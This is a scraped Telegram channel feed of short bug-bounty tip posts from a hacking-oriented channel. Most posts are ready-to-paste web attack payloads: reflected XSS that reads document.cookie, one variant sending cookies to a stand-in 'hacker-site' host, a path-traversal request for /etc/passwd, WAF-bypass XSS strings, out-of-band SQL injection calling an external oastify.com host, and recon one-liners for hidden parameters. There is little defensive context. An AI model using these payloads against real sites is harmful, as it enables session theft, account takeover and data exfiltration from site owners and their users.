BugCod3
6.19K subscribers
308 photos
5 videos
7 files
406 links
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: t.iss.one/BugCod3GP
📂 Topic: t.iss.one/BugCod3Topic

🤖 Contact: t.iss.one/BugCod3BOT
📧 Email: [email protected]
Download Telegram
Reflected XSS may lead to ATO

Payload:
"><script>alert(document.cookie)</script>


Simple Tip:
cat parameters.txt | grep ".php?" > php-params.txt

Test php-params.txt for: sqli, xss, html injection...etc

Attacking Cookies:
https://sub.target.com/en/test.php?vuln-param="><script>document.write('<img src="https://hacker-site/thing/?c='%2bdocument.cookie%2b'" />');</script


#BugBounty #Tips

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥432👍1
Payload:
site.tld/xyz/xyz/xyz/?path=../../../../../../../../../etc/passwd

#BugBounty #Tips

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥543
Bypass dot (.) block in XSS

alert(document.cookie)
alert(cookie)

Some times 'cookie' is a variable declared as 'document.cookie'

#XSS #BugBounty #Tips

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
5🔥43
Waf block any "</"

Try HTML injection </a> worked...

Payload:
</a<script>alert(document.cookie</script>

#BugBounty #Tips

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
42🔥2
A quick way to find "all" paths for Next.js websites:

console.log(__BUILD_MANIFEST.sortedPages)

👩‍💻 javascript:
console.log(__BUILD_MANIFEST.sortedPages.join('\n'));

#BugBounty #Tips #JS

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥832👍1
Add to your wordlist:

auth/jwt/register
auth-demo/register/classic
auth-demo/register/modern


#BugBounty #Tips

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
53🔥3👍1
WAF AKAMAI Bypass
Lead to 30 XSS in large BBP🤯

"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">


#BugBounty #Tips #Waf

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
5🔥53👍1
Out-of-Band SQL Injection

Payload:
'11111111111' AND (SELECT LOAD_FILE('\\\\https://xde3imh45q8x9o4ovz1kea6cd3ju7kv9.oastify.com\\a'))

'11111111111' AND (SELECT CONCAT('', (SELECT SLEEP(5)), (SELECT LOAD_FILE(CONCAT('\\\\', (SELECT 'https://14379q88wuz10svsm3so5exg47ayyqmf.oastify.com/a'))))))

#BugBounty #Tips #SQL

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
3👍3🔥21
Extract all endpoints from a JS File and take your bug 🐞

#BugBounty #Tips

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
🔥54👍31
Finding Hidden Parameter & Potential XSS with Arjun + KXSS

arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss


#BugBounty #Tips

📣 t.iss.one/Root_Exploit
📣 t.iss.one/BugCod3
32🔥2